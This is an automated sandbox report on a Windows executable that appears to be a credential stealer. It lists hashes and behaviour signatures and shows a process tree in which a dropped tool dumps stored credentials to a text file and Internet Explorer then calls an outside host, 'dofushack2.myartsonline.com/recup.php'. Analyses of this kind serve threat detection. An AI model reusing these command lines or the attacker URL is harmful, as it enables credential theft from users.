Analysis

  • max time kernel
    135s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2022 16:05

General

  • Target

    652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe

  • Size

    220KB

  • MD5

    6e1218085443b5d66f82cb98f9cca0b5

  • SHA1

    729ceb8815d87ef87a19a2bcdcba63ca35e85283

  • SHA256

    652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476

  • SHA512

    37b5016e6dbee243b8480c817457d72fb9a0cb78a725c010dfa50b219de560f44bb60e021abd5b55cbc62886581315b8c5aa1d1c645602512040e3c8b04de452

  • SSDEEP

    6144:EB9gvxc8jCA4AnyDfbmtezMP3P5HXt73:1eTMyDKtezMhHd

Score
9/10

Malware Config

Signatures

  • Nirsoft 1 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe
    "C:\Users\Admin\AppData\Local\Temp\652efbc10cdbd04f16eb8c5b51b00c974f40e78d1ab3543050a079f08a6f8476.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1260
    • C:\Windows\86380.exe
      "C:\Windows\86380.exe" /stext C:\Windows\86380.txt
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4788
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://dofushack2.myartsonline.com/recup.php?actif=Le_serveur_Dofus Conf_est_activé
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2140 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:4156

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Windows\86380.exe

    Filesize

    63KB

    MD5

    113417b6a1a108eb22337602661e7a59

    SHA1

    c89f17a24058a33851d02561bcdae48f327c18c5

    SHA256

    152374899c00e31678b5d627e4d05ff877f59cce3319cc024c25cf3bf40302a2

    SHA512

    182732b7853e0a28c73ea44a7e0c2ada764d74bb9010358d78ae4edd7829140d73af7d1ad7544a973ccff6f442593d5697ae792f604f410e8a35c9d18a680e88

  • C:\Windows\86380.exe

    Filesize

    63KB

    MD5

    113417b6a1a108eb22337602661e7a59

    SHA1

    c89f17a24058a33851d02561bcdae48f327c18c5

    SHA256

    152374899c00e31678b5d627e4d05ff877f59cce3319cc024c25cf3bf40302a2

    SHA512

    182732b7853e0a28c73ea44a7e0c2ada764d74bb9010358d78ae4edd7829140d73af7d1ad7544a973ccff6f442593d5697ae792f604f410e8a35c9d18a680e88

  • memory/1260-132-0x0000000000400000-0x000000000047B000-memory.dmp

    Filesize

    492KB

  • memory/1260-137-0x0000000000400000-0x000000000047B000-memory.dmp

    Filesize

    492KB

  • memory/1260-138-0x0000000000400000-0x000000000047B000-memory.dmp

    Filesize

    492KB

  • memory/4788-133-0x0000000000000000-mapping.dmp

  • memory/4788-136-0x0000000000400000-0x0000000000425000-memory.dmp

    Filesize

    148KB